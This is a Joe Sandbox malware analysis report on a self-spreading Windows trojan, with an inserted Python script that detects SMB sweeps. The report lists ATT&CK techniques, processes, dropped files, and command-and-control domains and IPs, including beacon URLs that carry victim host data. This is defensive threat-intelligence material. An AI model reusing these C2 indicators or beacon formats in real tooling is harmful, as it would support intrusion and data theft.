Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation11 | Path Interception | Process Injection11 | Masquerading1 | OS Credential Dumping1 | Network Share Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | PowerShell1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion31 | LSASS Memory | Query Registry1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Security Software Discovery21 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing11 | NTDS | Process Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Virtualization/Sandbox Evasion31 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Application Window Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Remote System Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Network Configuration Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Network Connections Discovery2 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | File and Directory Discovery2 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Right-to-Left Override | Input Capture | System Information Discovery13 | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | Service Stop

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph ID: 381876, Sample: UlJpFEz1Cj, Startdate: 05/04/2021, Architecture: WINDOWS, Score: 100

Start
  DNS/IP: info.ackng.com; info.abbny.com; 2 other IPs or domains
  Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 5 other signatures
  Started: UlJpFEz1Cj.exe

UlJpFEz1Cj.exe (34)
  Dropped: C:\Users\user\AppData\Local\...\win32wnet.pyd, PE32; C:\Users\user\AppData\Local\...\win32pipe.pyd, PE32; C:\Users\user\AppData\...\win32event.pyd, PE32; 25 other files (none is malicious)
  Signatures: Uses netstat to query active network connections and open ports; Gathers network related connection and port information
  Started: UlJpFEz1Cj.exe; conhost.exe

UlJpFEz1Cj.exe (3), child process
  DNS/IP: info.abbny.com 173.231.189.15, ports 49746, 50005, 50490, VOXEL-DOT-NETUS, United States; beahh.com 72.52.178.23, ports 49743, 49881, 50366, LIQUIDWEBUS, United States; 101 other IPs or domains
  Dropped: C:\Users\user\Desktop\m2.ps1, ASCII
  Signatures: Connects to many different private IPs via SMB (likely to spread or exploit); Connects to many different private IPs (likely to spread or exploit); Gathers network related connection and port information
  Started: cmd.exe (1); powershell.exe (18); cmd.exe (1); 4 other processes

cmd.exe (1)
  Signatures: Uses ipconfig to lookup or modify the Windows network settings
  Started: WMIC.exe (1)

powershell.exe (18)
  Signatures: Found suspicious powershell code related to unpacking or dynamic code loading

cmd.exe (1), second instance
  Started: net.exe (1)

4 other processes
  Started: net.exe (1); ipconfig.exe

net.exe (1), each instance
  Started: net1.exe (1)

Source | Detection | Scanner | Label | Link
UlJpFEz1Cj.exe | 61% | Virustotal | | Browse
UlJpFEz1Cj.exe | 83% | ReversingLabs | Win32.Trojan.InjectPyinc |
UlJpFEz1Cj.exe | 100% | Avira | HEUR/AGEN.1103356 |
UlJpFEz1Cj.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\m2.ps1 | 100% | Avira | TR/Drop.PShell.B |
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | 0% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._AES.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | 0% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._ARC4.pyd | 0% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd | 0% | Metadefender | | Browse
C:\Users\user\AppData\Local\Temp\_MEI65282\Crypto.Cipher._DES.pyd | 0% | ReversingLabs | |
Source | Detection | Scanner | Label | Link | Download
3.1.UlJpFEz1Cj.exe.1120000.15.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7 | | Download File
3.1.UlJpFEz1Cj.exe.1120000.16.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7 | | Download File
3.1.UlJpFEz1Cj.exe.1150000.19.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7 | | Download File
3.1.UlJpFEz1Cj.exe.1160000.22.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7 | | Download File
3.1.UlJpFEz1Cj.exe.1160000.21.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7 | | Download File
3.1.UlJpFEz1Cj.exe.1150000.20.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7 | | Download File
Source | Detection | Scanner | Label | Link
jsonip.com | 0% | Virustotal | | Browse
42.pl | 0% | Virustotal | | Browse
info.ackng.com | 11% | Virustotal | | Browse
beahh.com | 11% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://jsonip.com | 0% | Avira URL Cloud | safe |
http://ip.42.pl/raw | 0% | Avira URL Cloud | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://info.beahh.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 | 0% | Avira URL Cloud | safe |
http://w.beahh.com/page.html?p%COMPUTERNAME% | 0% | Avira URL Cloud | safe |
http://jsonip.com/ | 0% | Avira URL Cloud | safe |
http://pingcastle.com | 0% | Avira URL Cloud | safe |
http://blog.gentilkiwi.com/mimikatz | 0% | Avira URL Cloud | safe |
http://info.abbny.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 | 0% | Avira URL Cloud | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
http://i.haqo.net/s.png?u= | 0% | Avira URL Cloud | safe |
https://oneget.orgX | 0% | Avira URL Cloud | safe |
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | 0% | Avira URL Cloud | safe |
http://pywin32.sourceforge.net0 | 0% | Avira URL Cloud | safe |
https://oneget.org | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
jsonip.com | 45.79.77.20 | true | false | | unknown
42.pl | 79.98.145.42 | true | false | | unknown
info.ackng.com | 127.0.0.1 | true | true | | unknown
beahh.com | 72.52.178.23 | true | true | | unknown
info.abbny.com | 173.231.189.15 | true | true | | unknown
info.beahh.com | unknown | unknown | false | | unknown
ip.42.pl | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://ip.42.pl/raw | false | Avira URL Cloud: safe | unknown
http://info.beahh.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 | true | Avira URL Cloud: safe | unknown
http://jsonip.com/ | false | Avira URL Cloud: safe | unknown
http://info.abbny.com/e.png?id=830021&mac=EC-F4-BB-86-2D-ED,00-01-00-01-24-A6&OS=Windows-post2008Server-6.2.9200&BIT=32bit&IT=2021-04-05,11:23:08&c=1&VER=9&d=0&from=&mpass=&size=6967362&num=0&sa=&dig=0&mdl=0 | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://mysmartlogon.com | PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.dr | false | | high
http://python.org/dev/peps/pep-0263/ | python27.dll.0.dr | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://jsonip.com | UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://w.beahh.com/page.html?p%COMPUTERNAME% | UlJpFEz1Cj.exe, 00000003.00000003.203152303.00000000043DE000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 0000000C.00000003.266052902.000001FD83EDD000.00000004.00000001.sdmp | false | | high
http://www.openssl.org/support/faq.html | _ssl.pyd.0.dr | false | | high
http://pingcastle.com | PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.dr | false | Avira URL Cloud: safe | unknown
http://blog.gentilkiwi.com/mimikatz | PowerShell_transcript.830021.w56wNSku.20210405112311.txt.12.dr | true | Avira URL Cloud: safe | unknown
http://www.openssl.org/support/faq.html.................... | _hashlib.pyd.0.dr | false | | high
http://www.unicode.org/reports/tr44/tr44-4.html). | unicodedata.pyd.0.dr | false | | high
https://contoso.com/ | powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000003.266380393.000001FD84074000.00000004.00000001.sdmp | false | | high
http://i.haqo.net/s.png?u= | UlJpFEz1Cj.exe, 00000003.00000003.203337059.0000000004523000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.orgX | powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand | powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://pywin32.sourceforge.net0 | pywintypes27.dll.0.dr | false | Avira URL Cloud: safe | unknown
https://oneget.org | powershell.exe, 0000000C.00000003.265344644.000001FD838DB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
79.98.145.42 | 42.pl | Poland | | 39310 | NITRONETPL | false
173.231.189.15 | info.abbny.com | United States | | 29791 | VOXEL-DOT-NETUS | true
72.52.178.23 | beahh.com | United States | | 32244 | LIQUIDWEBUS | true
                            IP
                            192.168.0.2
                            192.168.0.1
                            192.168.0.4
                            192.168.0.3
                            192.168.0.14
                            192.168.0.9
                            192.168.0.15
                            192.168.0.16
                            192.168.0.17
                            192.168.0.6
                            192.168.0.18
                            192.168.0.5
                            192.168.0.19
                            192.168.0.8
                            192.168.0.7
                            192.168.0.20
                            192.168.0.21
                            192.168.0.22
                            192.168.0.23
                            192.168.0.24
                            192.168.3.93
                            192.168.0.10
                            192.168.0.11
                            192.168.0.12
                            192.168.0.13
                            192.168.0.170
                            192.168.0.172
                            192.168.0.171
                            192.168.0.58
                            192.168.0.59
                            192.168.0.61
                            192.168.0.62
                            192.168.0.63
                            192.168.0.64
                            192.168.0.65
                            192.168.0.66
                            192.168.0.67
                            192.168.0.68
                            192.168.0.178
                            192.168.0.177
                            192.168.0.179
                            192.168.0.174
                            192.168.0.173
                            192.168.0.176
                            192.168.0.60
                            192.168.0.175
                            192.168.0.161
                            192.168.0.160
                            192.168.0.47
                            192.168.0.48
                            192.168.0.49
                            192.168.0.50
                            192.168.0.51
                            192.168.0.52
                            192.168.0.53
                            192.168.0.54
                            192.168.0.55
                            192.168.0.56
                            192.168.0.57
                            192.168.0.167
                            192.168.0.166
                            192.168.0.169
                            192.168.0.168
                            192.168.0.163
                            192.168.0.162
                            127.0.0.1
                            192.168.0.165
                            192.168.0.164
                            192.168.0.192
                            192.168.0.191
                            192.168.0.194
                            192.168.0.193
                            192.168.0.190
                            192.168.0.36
                            192.168.0.37
                            192.168.0.38
                            192.168.0.39
                            192.168.0.40
                            192.168.0.41
                            192.168.0.42
                            192.168.0.43
                            192.168.0.44
                            192.168.0.45
                            192.168.0.46
                            192.168.0.199
                            192.168.0.196
                            192.168.0.195
                            192.168.0.198
                            192.168.0.197
                            192.168.0.181
                            192.168.0.180
                            192.168.0.183
                            192.168.0.182
                            192.168.0.25
                            192.168.0.26
                            192.168.0.27
                            192.168.0.28
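The private-IP list above is the raw material behind the report's "Connects to many different private IPs via SMB" signature: dozens of distinct 192.168.0.x hosts touched in one short run. The following Python is an added example, not part of the Joe Sandbox report, showing the equivalent detection a SOC would run over its own connection logs. The connection records are constructed: the destination addresses are taken from the list above, while the source addresses (192.168.0.100, .200, .201), the timestamps and the 20-host threshold are assumptions.

```python
"""Detection logic for the SMB fan-out the report flags as
"Connects to many different private IPs via SMB".

Added example, not part of the Joe Sandbox report. The connection records
are constructed: destination addresses are taken from the report's
private-IP list, while the source addresses (192.168.0.100, .200, .201),
timestamps and the 20-host threshold are assumptions.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, Set, Tuple

# (timestamp, src_ip, dst_ip, dst_port)
Record = Tuple[datetime, str, str, int]


def is_sweep_target(ip: str) -> bool:
    """Private address other than loopback. 127.0.0.1 is in the report's
    list, but a connection to self is not lateral movement."""
    addr = ipaddress.ip_address(ip)
    return addr.is_private and not addr.is_loopback


def detect_smb_sweeps(records: Iterable[Record], min_targets: int = 20,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, Set[str]]:
    """Map each source that reached >= min_targets distinct private hosts on
    445/tcp inside one sliding window to the full set of hosts it touched."""
    per_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, dst, port in records:
        if port == 445 and is_sweep_target(dst):
            per_src[src].append((ts, dst))

    hits: Dict[str, Set[str]] = {}
    for src, events in per_src.items():
        events.sort()
        left = 0
        for right in range(len(events)):
            # shrink the window from the left until it spans <= `window`
            while events[right][0] - events[left][0] > window:
                left += 1
            if len({dst for _, dst in events[left:right + 1]}) >= min_targets:
                hits[src] = {dst for _, dst in events}
                break
    return hits


SWEEP_TARGETS = [  # drawn from the private-IP list in the report
    "192.168.0.10", "192.168.0.11", "192.168.0.12", "192.168.0.13",
    "192.168.0.22", "192.168.0.23", "192.168.0.24", "192.168.0.25",
    "192.168.0.26", "192.168.0.27", "192.168.0.28", "192.168.0.36",
    "192.168.0.37", "192.168.0.38", "192.168.0.39", "192.168.0.40",
    "192.168.0.41", "192.168.0.42", "192.168.0.43", "192.168.0.44",
    "192.168.0.45", "192.168.0.46", "192.168.0.47", "192.168.0.48",
    "192.168.3.93", "127.0.0.1",
]


def sample_records() -> List[Record]:
    """Constructed connection log: one sweeping host, two benign hosts."""
    t0 = datetime(2021, 4, 5, 11, 23, 0)  # analysis start time from the report
    recs: List[Record] = []
    for i, dst in enumerate(SWEEP_TARGETS):        # infected host sweeping 445
        recs.append((t0 + timedelta(seconds=i), "192.168.0.100", dst, 445))
    for i, dst in enumerate(SWEEP_TARGETS[:3]):    # client of three file shares
        recs.append((t0 + timedelta(seconds=i), "192.168.0.200", dst, 445))
    for i, dst in enumerate(SWEEP_TARGETS):        # many hosts, but on 80/tcp
        recs.append((t0 + timedelta(seconds=i), "192.168.0.201", dst, 80))
    return recs


if __name__ == "__main__":
    for src, targets in detect_smb_sweeps(sample_records()).items():
        print(f"{src}: SMB connections to {len(targets)} distinct private hosts")
```

Only the sweeping host fires: the three-share client stays under the threshold and the host that touches every address on 80/tcp is ignored because the rule is keyed on 445. Loopback is excluded on purpose, since the sandbox list contains 127.0.0.1 and counting it would inflate every host's tally by one.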

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:381876
                            Start date:05.04.2021
                            Start time:11:22:13
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 36s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:UlJpFEz1Cj (renamed file extension from none to exe)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:39
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.expl.evad.winEXE@30/39@21/100
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            Warnings:
                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, dwm.exe, wermgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.43.193.48, 52.255.188.83, 104.43.139.144, 20.50.102.62, 184.30.20.56, 205.185.216.10, 205.185.216.42, 51.103.5.159, 92.122.213.194, 92.122.213.247, 20.190.160.4, 20.190.160.67, 20.190.160.75, 20.190.160.129, 20.190.160.132, 20.190.160.8, 20.190.160.134, 20.190.160.2, 104.42.151.234, 20.54.26.129, 20.82.210.154
                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wns.notify.trafficmanager.net, login.live.com, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, client.wns.windows.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, www.tm.a.prd.aadg.akadns.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
11:23:03 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
11:23:13 | API Interceptor | 86x Sleep call for process: powershell.exe modified
11:24:50 | API Interceptor | 5x Sleep call for process: UlJpFEz1Cj.exe modified
Match | Associated Sample Name / URL | Detection | Context
72.52.178.23 | E2qMfhH57G.exe | malicious | www.trackyourvote.com/4qdc/?OhNhA=2AnbmslJtTC0mJvOM3YsDuM40JkIxhFjJH4tZT4junZNCqeMBqARBqQH0BcYEn6RxflB&Yn=fbdxBxrpK46dFH
72.52.178.23 | 32ciKQsy2X.exe | malicious | www.trackyourvote.com/4qdc/?AR-XJ2=2AnbmslJtTC0mJvOM3YsDuM40JkIxhFjJH4tZT4junZNCqeMBqARBqQH0C8iU2apr4EG&et-=XPJxZ2SpixNTl6pp
72.52.178.23 | xPUqa4qbDL.js | malicious | 101legit.com/0.html
72.52.178.23 | xPUqa4qbDL.js | malicious | 101legit.com/0.html
72.52.178.23 | 81msxxUisn.exe | malicious | www.nogrudge.com/ndm/?ndkdxd=UXX0bLfxYLyH&mHLDZX=H2A+iUcBXA4pvzlpLnHoTtAhYe/AosYsS6mssCYUdSkJoc9KzWoLI56ChKKWBKP76/3sWxYIhQ==
72.52.178.23 | Q38V8rfI5H.js | malicious | 101legit.com/0.html
72.52.178.23 | Q38V8rfI5H.js | malicious | 101legit.com/0.html
72.52.178.23 | 7IEK8G8P67.js | malicious | 101legit.com/0.html
72.52.178.23 | 7IEK8G8P67.js | malicious | 101legit.com/0.html
72.52.178.23 | PI 11172020.xlsx | malicious | www.paragonic.com/egem/?Ob20Lf_=+SOZmDNuyMcuxJO1TLnPFsdIsmdtl1qFj/QFY12FkiWknvVrPNzDCdooHZfrGkV6uT0+EQ==&BB6=L48xY
72.52.178.23 | SKMBT 25032020 Ref- 0000019.exe | malicious | www.aalldxea.com/pg/
72.52.178.23 | 4535B9F39E debt payment invoice #U007epdf.js | malicious | canonsupervideo4k.ws/3yiqvg7v
72.52.178.23 | 4535B9F39E debt payment invoice #U007epdf.js | malicious | canonsupervideo4k.ws/3yiqvg7v
79.98.145.42 | HVgt9BCw5n.exe | malicious | ip.42.pl/raw
79.98.145.42 | SCJOSdfBws.exe | malicious | ip.42.pl/raw
79.98.145.42 | JwSzaivpgG.exe | malicious | ip.42.pl/raw
79.98.145.42 | WuSttkXyhP.exe | malicious | ip.42.pl/raw
79.98.145.42 | ZATpIQL.exe | malicious | ip.42.pl/raw
79.98.145.42 | SecuriteInfo.com.Trojan.DownLoader34.18436.32216.exe | malicious | ip.42.pl/raw
79.98.145.42 | nPwbB.exe | malicious | ip.42.pl/raw
173.231.189.15 | HVgt9BCw5n.exe | malicious
Match | Associated Sample Name / URL | Detection | Context
jsonip.com | HVgt9BCw5n.exe | malicious | 45.79.77.20
jsonip.com | Deposit_50%PAYMENT TERM -PO09-excel.htm | malicious | 45.79.77.20
jsonip.com | https://doc.clickup.com/p/h/2hm67-99/806f7673f7694a9 | malicious | 45.79.77.20
jsonip.com | https://farmetal.org/ofc3 | malicious | 45.79.77.20
jsonip.com | https://clarifyescape.com/office/ofc/?signin= | malicious | 45.79.77.20
jsonip.com | https://thefieldpro.com/securelink | malicious | 45.79.77.20
jsonip.com | SCJOSdfBws.exe | malicious | 45.79.77.20
jsonip.com | JwSzaivpgG.exe | malicious | 45.79.77.20
jsonip.com | WuSttkXyhP.exe | malicious | 45.79.77.20
jsonip.com | xX1VBl56Zg.exe | malicious | 45.79.77.20
jsonip.com | u60A9siB9m.exe | malicious | 45.79.77.20
jsonip.com | https://wlsinterests-my.sharepoint.com/:u:/g/personal/egarza_wlshotels_com/EbIh0IlzFF1CmTAMJAhEHp0B74FV0UNvzBJpu_LKCy4rUg?e=6UjkIF | malicious | 45.79.77.20
jsonip.com | http://www.authorea.com/496817/s_HUCBQs4gOQpqvMdvqmFQ | malicious | 45.79.77.20
jsonip.com | https://icsheadstart-my.sharepoint.com/:b:/g/personal/agreer_ics-hs_org/Efrk8FYTb6pNqHO8jgX4qqcB1ibAW9ZmUWYUGIEnXM4YxA?e=4%3a8jNJwB&at=9 | malicious | 45.79.77.20
jsonip.com | https://share.nuclino.com/p/Ashwood-Law-ShareFile-dbygAiq5tcoYg4AQkWEFue | malicious | 45.79.77.20
jsonip.com | https://sponewear.com/plugin-france/v12/index.php | malicious | 45.79.77.20
jsonip.com | https://bit.ly/2FB9WP9 | malicious | 45.79.77.20
jsonip.com | https://e-sportnyt.dk/folder/refresheedofccieesforthenewtwentytwentyscamp/ofc1/index.php | malicious | 45.79.77.20
jsonip.com | https://palmettoironllccom-my.sharepoint.com:443/:b:/g/personal/mandy_palmettoironllc_com/EXqv1co8ojtOkblXk3pZQOMBSROp8YnwDIUb8jaJFNcTTA?e=4%3aC8pdUw&at=9 | malicious | 45.79.77.20
jsonip.com | https://freeday.opens2019.rs/public/back/refresheedofccieesforthenewtwentytwentyscamp/ofc1/index.php | malicious | 45.79.77.20
Match | Associated Sample Name / URL | Detection | Context
LIQUIDWEBUS | HVgt9BCw5n.exe | malicious | 72.52.178.23
LIQUIDWEBUS | Purchase_Order 3109.xls | malicious | 67.227.236.238
LIQUIDWEBUS | RMwfvA9kZy.exe | malicious | 67.225.129.56
LIQUIDWEBUS | yx8DBT3r5r.exe | malicious | 67.227.226.240
LIQUIDWEBUS | qzinl7qkwD.exe | malicious | 50.28.59.161
LIQUIDWEBUS | z2xQEFs54b.exe | malicious | 72.52.178.23
LIQUIDWEBUS | qzinl7qkwD.exe | malicious | 50.28.59.161
LIQUIDWEBUS | E2qMfhH57G.exe | malicious | 72.52.178.23
LIQUIDWEBUS | 32ciKQsy2X.exe | malicious | 72.52.178.23
LIQUIDWEBUS | SpaceX Starbase Invite.xlsm | malicious | 67.227.251.48
LIQUIDWEBUS | SpaceX Starbase Invite.xlsm | malicious | 67.227.251.48
LIQUIDWEBUS | SpaceX Starbase Invite.xlsm | malicious | 67.227.251.48
LIQUIDWEBUS | xPUqa4qbDL.js | malicious | 72.52.178.23
LIQUIDWEBUS | xPUqa4qbDL.js | malicious | 72.52.178.23
LIQUIDWEBUS | SecuriteInfo.com.VB.Heur2.EmoDldr.16.C2C1C6E0.Gen.19261.xlsm | malicious | 67.227.251.48
LIQUIDWEBUS | file.doc | malicious | 67.227.152.97
LIQUIDWEBUS | N6Ej6HEuQt.exe | malicious | 67.225.164.116
LIQUIDWEBUS | Payslip 3-3-pdf.exe | malicious | 69.16.200.142
LIQUIDWEBUS | Statement_of_Account_as_of_mar_01_2021.xlsm | malicious | 67.227.237.109
LIQUIDWEBUS | Complaint_Letter_1195372013-02192021.xls | malicious | 72.52.229.105
VOXEL-DOT-NETUS | HVgt9BCw5n.exe | malicious | 173.231.189.15
VOXEL-DOT-NETUS | Red Gospel Mission Due Invoices.htm | malicious | 216.52.2.30
VOXEL-DOT-NETUS | prompt.exe | malicious | 173.231.184.124
VOXEL-DOT-NETUS | taskmgr.exe | malicious | 162.217.99.134
VOXEL-DOT-NETUS | z2xQEFs54b.exe | malicious | 162.217.99.134
VOXEL-DOT-NETUS | 14wfa5dfs.exe | malicious | 64.95.103.190
VOXEL-DOT-NETUS | 2CmsahykgZ.exe | malicious | 107.6.74.73
VOXEL-DOT-NETUS | aTbfFdzWQw.exe | malicious | 63.251.235.71
VOXEL-DOT-NETUS | AgroAG008021921doc_pdf.exe | malicious | 63.251.227.200
VOXEL-DOT-NETUS | GoE9u8SlS8.exe | malicious | 63.251.235.71
VOXEL-DOT-NETUS | #U5ba2#U6237#U7aef.exe | malicious | 162.217.99.134
VOXEL-DOT-NETUS | ijjKuVEER4.exe | malicious | 63.251.235.71
VOXEL-DOT-NETUS | VM7AwxwMjV.exe | malicious | 63.251.235.71
VOXEL-DOT-NETUS | 14wfa5dfs.exe | malicious | 63.251.235.71
VOXEL-DOT-NETUS | request_form_1612805504.xls | malicious | 63.251.235.71
VOXEL-DOT-NETUS | 14wfa5dfs.exe | malicious | 63.251.235.71
